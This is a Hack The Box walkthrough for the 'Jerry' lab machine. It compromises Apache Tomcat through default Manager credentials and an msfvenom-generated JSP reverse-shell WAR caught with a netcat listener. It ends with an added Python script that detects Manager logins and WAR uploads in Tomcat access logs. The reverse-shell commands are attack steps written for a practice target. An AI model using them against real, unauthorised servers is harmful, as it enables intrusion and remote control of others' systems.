Hack The Box - Jerry Walkthrough


HackTheBox Jerry Scope



Let’s do a port scan to find out which services are running.

nmap -sC -sV -oA nmap/initial -vvv 
HackTheBox Jerry nmap scan

We found that Apache Tomcat is running and serving HTTP on port 8080, so let’s check what is being served at

HackTheBox Jerry - Landing web page

Manager App looks interesting. Upon clicking on it, we are greeted with a login prompt.

HackTheBox Jerry - Web login

Upon clicking cancel, we are greeted with an example of default credentials for Tomcat.

HackTheBox Jerry - Web 401 Error

If we put those credentials into the login prompt from earlier, we reach the console page.

HackTheBox Jerry - Tomcat Manager App

We see a place to upload a file, so let’s use msfvenom to generate a payload to get a reverse shell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=44 -f war > shelle0.war
HackTheBox Jerry - msfvenom reverse shell payload

Next we upload the payload and go to

HackTheBox Jerry - Tomcat Manager App with msfvenom reverse shell payload uploaded

Then we use netcat to listen on port 44 to get a shell.

nc -l -v -p 44
HackTheBox Jerry - reverse shell with netcat

With some poking around, we find some logins for Tomcat.

HackTheBox Jerry - Tomcat Users Credentials

Now if we navigate to the desktop of the Administrator account, we find the flags.

HackTheBox Jerry - Flags
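
From the defender's side, the Manager login and WAR upload used above leave a clear trail in Tomcat's access log. The script below is an added example, not part of the original walkthrough: it assumes the access log uses the "common" pattern, and the log lines, IP addresses, user name and context name in it are constructed.

```python
import re

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+$')

# Constructed sample log (documentation IP ranges, made-up context name).
SAMPLE = """\
198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2536
198.51.100.7 - - [10/Mar/2024:10:00:09 +0000] "GET /manager/html HTTP/1.1" 401 2536
198.51.100.7 - tomcat [10/Mar/2024:10:00:15 +0000] "GET /manager/html HTTP/1.1" 200 19689
198.51.100.7 - tomcat [10/Mar/2024:10:01:02 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=AAAA HTTP/1.1" 200 20011
198.51.100.7 - - [10/Mar/2024:10:01:30 +0000] "GET /example-app/ HTTP/1.1" 200 0
192.0.2.10 - - [10/Mar/2024:10:02:00 +0000] "GET /docs/ HTTP/1.1" 200 1200
"""

def is_deploy(method, path):
    """True for the Manager deploy endpoints: HTML upload form and text API."""
    return (method, path) in {("POST", "/manager/html/upload"),
                              ("PUT", "/manager/text/deploy")}

def analyze(log_text, allowed_admin_hosts=()):
    """Return (host, rule, detail) alerts for Manager use by unexpected hosts."""
    alerts, failures, seen = [], {}, set()
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # line does not follow the common pattern
        host, user, method, target, status = m.groups()
        path = target.split("?", 1)[0]  # drop the query string (CSRF nonce etc.)
        if not path.startswith("/manager/") or host in allowed_admin_hosts:
            continue
        if status == "401":
            failures[host] = failures.get(host, 0) + 1
            continue
        if user == "-" or not status.startswith("2"):
            continue
        if (host, user) not in seen:  # first authenticated Manager request
            seen.add((host, user))
            alerts.append((host, "manager-auth",
                           f"user={user} prior_401={failures.get(host, 0)}"))
        if is_deploy(method, path):
            alerts.append((host, "war-deploy", f"user={user} {method} {path}"))
    return alerts

if __name__ == "__main__":
    for alert in analyze(SAMPLE):
        print(alert)
```

Passing the hosts that are expected to administer Tomcat as allowed_admin_hosts leaves only Manager logins and deployments from anywhere else.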



Here is a list of resources I used at some point while working on Jerry:

